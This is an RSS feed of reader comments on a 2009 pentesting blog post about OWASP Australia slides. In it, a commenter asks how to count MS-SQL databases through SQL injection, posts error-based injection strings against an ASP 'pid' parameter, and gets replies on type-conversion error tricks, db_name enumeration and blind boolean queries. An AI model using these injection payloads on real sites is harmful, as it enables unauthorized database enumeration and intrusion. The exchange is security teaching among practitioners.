<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Slides From OWASP Au 2009</title>
	<atom:link href="http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Sun, 22 Aug 2010 14:39:55 +0100</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: sid</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-82797</link>
		<dc:creator>sid</dc:creator>
		<pubDate>Mon, 06 Apr 2009 10:13:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-82797</guid>
		<description>select cast(&#039;total database:&#039;+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases

Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value &#039;total database:6&#039; to data type int.</description>
		<content:encoded><![CDATA[<p>select cast(&#8217;total database:&#8217;+cast(count(name) as nvarchar)as int) from master.dbo.sysdatabases</p>
<p>Msg 245, Level 16, State 1, Line 1<br />
Conversion failed when converting the nvarchar value &#8216;total database:6&#8242; to data type int.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sid</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-82793</link>
		<dc:creator>sid</dc:creator>
		<pubDate>Mon, 06 Apr 2009 09:45:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-82793</guid>
		<description>Thats because, the query returns an integer, and type conversion from int to int is valid and hence no errors.

I will look for some more type conversions to get this returned as error message.

You can still use the blind injection boolean query to get this value, but i think i know what are you after.. :)</description>
		<content:encoded><![CDATA[<p>Thats because, the query returns an integer, and type conversion from int to int is valid and hence no errors.</p>
<p>I will look for some more type conversions to get this returned as error message.</p>
<p>You can still use the blind injection boolean query to get this value, but i think i know what are you after.. <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Marezzi</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-82691</link>
		<dc:creator>Marezzi</dc:creator>
		<pubDate>Sun, 05 Apr 2009 22:43:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-82691</guid>
		<description>tnx for info but not working.I know for the db_name(n) but i need this.  asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))--
I don&#039;t see an error. also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))-- no success
Don&#039;t know what to do</description>
		<content:encoded><![CDATA[<p>tnx for info but not working.I know for the db_name(n) but i need this.  asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))&#8211;<br />
I don&#8217;t see an error. also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))&#8211; no success<br />
Don&#8217;t know what to do</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sid</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-82483</link>
		<dc:creator>sid</dc:creator>
		<pubDate>Sat, 04 Apr 2009 20:53:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-82483</guid>
		<description>i think you are after this:

Select count(distinct name) from master.dbo.sysdatabases

or you can do select db_name(n)

and enumerate n till you get null.

Hope it helps ...:)</description>
		<content:encoded><![CDATA[<p>i think you are after this:</p>
<p>Select count(distinct name) from master.dbo.sysdatabases</p>
<p>or you can do select db_name(n)</p>
<p>and enumerate n till you get null.</p>
<p>Hope it helps &#8230;:)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Marezzi</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-82479</link>
		<dc:creator>Marezzi</dc:creator>
		<pubDate>Sat, 04 Apr 2009 20:38:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-82479</guid>
		<description>nice slides :) I have 1 question, how can i count how many databases are there via sql injection in MS-SQL?I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)),  or Select count(name) from master.dbo.sysdatabases
Thanks</description>
		<content:encoded><![CDATA[<p>nice slides <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  I have 1 question, how can i count how many databases are there via sql injection in MS-SQL?I want to apply this query. Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA)),  or Select count(name) from master.dbo.sysdatabases<br />
Thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Benjamin</title>
		<link>http://www.notsosecure.com/folder2/2009/03/19/slides-from-owasp-au-2009/comment-page-1/#comment-80278</link>
		<dc:creator>Benjamin</dc:creator>
		<pubDate>Wed, 25 Mar 2009 22:33:10 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=197#comment-80278</guid>
		<description>Hey Sumsid!

Thanks for those slides :)</description>
		<content:encoded><![CDATA[<p>Hey Sumsid!</p>
<p>Thanks for those slides <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
</channel>
</rss>
